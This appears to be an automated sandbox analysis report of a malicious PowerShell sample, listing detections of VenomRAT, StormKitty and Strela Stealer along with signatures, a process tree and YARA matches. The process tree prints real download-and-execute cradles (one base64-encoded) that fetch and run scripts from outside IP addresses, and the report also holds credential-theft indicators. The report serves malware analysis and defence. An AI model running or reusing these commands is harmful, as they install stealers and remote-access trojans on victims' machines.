Edit tour

Windows Analysis Report
2 ps1.ps1

Overview

General Information

Sample name:	2 ps1.ps1
Analysis ID:	1583431
MD5:	005b395fecc3e18d5bc9acb93bf96a4f
SHA1:	34db5ff90015817fe8b2fe56ca241d6965ae95d4
SHA256:	5605af6e3cba4057057a8cc765f94d1112d1a147171e056b1bdfcc3b38a056f0
Tags:	bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

KeyLogger, StormKitty, Strela Stealer, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected BrowserPasswordDump

Yara detected Keylogger Generic

Yara detected Powershell download and execute

Yara detected StormKitty Stealer

Yara detected Strela Stealer

Yara detected VenomRAT

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Compiles code for process injection (via .Net compiler)

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Machine Learning detection for dropped file

Powershell drops PE file

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: PowerShell Download and Execution Cradles

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 3200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2 ps1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7104 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

Package.exe (PID: 2972 cmdline: C:\Windows\Temp\Package.exe MD5: 2696D944FFBEF69510B0C826446FD748)

cmd.exe (PID: 5468 cmdline: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2276 cmdline: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 7196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7212 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C9B.tmp" "c:\Users\user\AppData\Local\Temp\iacipmps\CSCF2F885C8C35E43FC9D7ABBAE94A3C2AF.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 7292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, 404KeyLogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x3407e4:$a1: havecamera 0x39282e:$a2: timeout 3 > NUL 0x395f91:$a3: START "" " 0x396538:$a3: START "" " 0x396413:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x3964b0:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
dump.pcap	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x39a8a2:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x392058:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x38dcc8:$s6: VirtualBox 0x39edc7:$s6: VirtualBox 0x39a0de:$s8: Win32_ComputerSystem 0x39ed2d:$s8: Win32_ComputerSystem 0x396eb6:$s9: Win32_Process Where ParentProcessID= 0x3969af:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x396ba7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x396c8f:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241ee0:$a1: havecamera 0x28cd0a:$a2: timeout 3 > NUL 0x29008d:$a3: START "" " 0x2905a2:$a3: START "" " 0x29047d:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x29051a:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2942de:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28c57a:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x2886ee:$s6: VirtualBox 0x29826d:$s6: VirtualBox 0x293c8a:$s8: Win32_ComputerSystem 0x2981d3:$s8: Win32_ComputerSystem 0x290db6:$s9: Win32_Process Where ParentProcessID= 0x2909d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x290a70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x290b85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290c6d:$cnc4: POST / HTTP/1.1
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x231ec0:$a1: havecamera 0x27ccea:$a2: timeout 3 > NUL 0x28006d:$a3: START "" " 0x280582:$a3: START "" " 0x28045d:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x2804fa:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2842be:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x27c55a:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x2786ce:$s6: VirtualBox 0x28824d:$s6: VirtualBox 0x283c6a:$s8: Win32_ComputerSystem 0x2881b3:$s8: Win32_ComputerSystem 0x280d96:$s9: Win32_Process Where ParentProcessID= 0x2809b3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x280a50:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x280b65:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x280c4d:$cnc4: POST / HTTP/1.1
Process Memory Space: powershell.exe PID: 2180	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x954b2:$b2: ::FromBase64String( 0x954e4:$b2: ::FromBase64String( 0x95516:$b2: ::FromBase64String( 0x10a4d1:$b2: ::FromBase64String( 0x10a503:$b2: ::FromBase64String( 0x10a535:$b2: ::FromBase64String( 0x1772ae:$b2: ::FromBase64String( 0x1772e0:$b2: ::FromBase64String( 0x177312:$b2: ::FromBase64String( 0xf355:$s1: -join 0x1c42a:$s1: -join 0x1f7fc:$s1: -join 0x1feae:$s1: -join 0x2199f:$s1: -join 0x23ba5:$s1: -join 0x243cc:$s1: -join 0x24c3c:$s1: -join 0x25377:$s1: -join 0x253a9:$s1: -join 0x253f1:$s1: -join 0x25410:$s1: -join
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_StrelaStealer	Yara detected Strela Stealer	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_Keylogger_Generic_1	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: powershell.exe PID: 2276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 2276	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x19d71:$b2: ::FromBase64String( 0x19da5:$b2: ::FromBase64String( 0x19dd9:$b2: ::FromBase64String( 0x103ed6:$b2: ::FromBase64String( 0x103f0a:$b2: ::FromBase64String( 0x103f3e:$b2: ::FromBase64String( 0x1c9d9c:$b2: ::FromBase64String( 0x1c9dd0:$b2: ::FromBase64String( 0x1c9e04:$b2: ::FromBase64String( 0x20389b:$b2: ::FromBase64String( 0x2038cf:$b2: ::FromBase64String( 0x203903:$b2: ::FromBase64String( 0x277562:$b2: ::FromBase64String( 0x277596:$b2: ::FromBase64String( 0x2775ca:$b2: ::FromBase64String( 0x15ff24:$s1: -join 0x16cff9:$s1: -join 0x1703cb:$s1: -join 0x170a7d:$s1: -join 0x17256e:$s1: -join 0x174774:$s1: -join
Process Memory Space: powershell.exe PID: 2276	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xd9b51:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x38e2a0:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: powershell.exe PID: 2276	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7d905:$s6: VirtualBox 0x332054:$s6: VirtualBox 0xd9827:$s8: Win32_ComputerSystem 0xdba44:$s8: Win32_ComputerSystem 0x2b9018:$s8: Win32_ComputerSystem 0x2b928b:$s8: Win32_ComputerSystem 0x2bdf0d:$s8: Win32_ComputerSystem 0x2bdfb0:$s8: Win32_ComputerSystem 0x38df76:$s8: Win32_ComputerSystem 0x390193:$s8: Win32_ComputerSystem 0xd817d:$s9: Win32_Process Where ParentProcessID= 0x38c8cc:$s9: Win32_Process Where ParentProcessID= 0xd7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x38c6df:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd7fde:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x38c72d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xd8068:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x38c7b7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xd80dc:$cnc4: POST / HTTP/1.1 0x38c82b:$cnc4: POST / HTTP/1.1
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.powershell.exe.525bde2.0.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty
8.2.powershell.exe.4f9a7a0.2.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty
8.2.powershell.exe.503ed84.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty
8.2.powershell.exe.503a820.4.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x4b2c:$x2: https://github.com/LimerBoy/StormKitty 0x4b48:$x3: StormKitty
8.2.powershell.exe.4f6df4c.3.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x2ce1c:$x2: https://github.com/LimerBoy/StormKitty 0x2ce38:$x3: StormKitty
8.2.powershell.exe.503ed84.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x21b826:$x2: https://github.com/LimerBoy/StormKitty 0x21b842:$x3: StormKitty
8.2.powershell.exe.4f9a7a0.2.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0xa2dac:$x2: https://github.com/LimerBoy/StormKitty 0x2bfe0a:$x2: https://github.com/LimerBoy/StormKitty 0xa2dc8:$x3: StormKitty 0x2bfe26:$x3: StormKitty
8.2.powershell.exe.6466862.6.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
8.2.powershell.exe.6466862.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.powershell.exe.6466862.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.powershell.exe.6466862.6.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
8.2.powershell.exe.6466862.6.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
8.2.powershell.exe.6466862.6.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
8.2.powershell.exe.6466862.6.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths 0x1556bf:$str15: ChromiumPswPaths 0x151602:$str16: DetectedBankingServices 0x15176b:$str17: DetectCryptocurrencyServices 0x15f664:$str18: CheckRemoteDebuggerPresent 0x1605e9:$str19: GetConnectedCamerasCount
8.2.powershell.exe.6466862.6.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebc8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.*?)"
8.2.powershell.exe.6466862.6.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x177ace:$str05: Perfor_mance 0x177b12:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x1783c0:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x1776ae:$str12: ProcessHacker.exe 0x1778a0:$str13: Select * from Win32_CacheMemory
8.2.powershell.exe.6466862.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2
8.2.powershell.exe.6466862.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1778a0:$q1: Select * from Win32_CacheMemory 0x1778e0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x17792e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x17797c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
8.2.powershell.exe.6466862.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
8.2.powershell.exe.6466862.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN
8.2.powershell.exe.6466862.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.powershell.exe.6466862.6.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1
8.2.powershell.exe.6076822.5.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
8.2.powershell.exe.6076822.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.powershell.exe.6076822.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
8.2.powershell.exe.6076822.5.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
8.2.powershell.exe.6076822.5.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
8.2.powershell.exe.6076822.5.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d69e:$a1: havecamera 0x1684c8:$a2: timeout 3 > NUL 0x16b84b:$a3: START "" " 0x16bd60:$a3: START "" " 0x16bc3b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcd8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
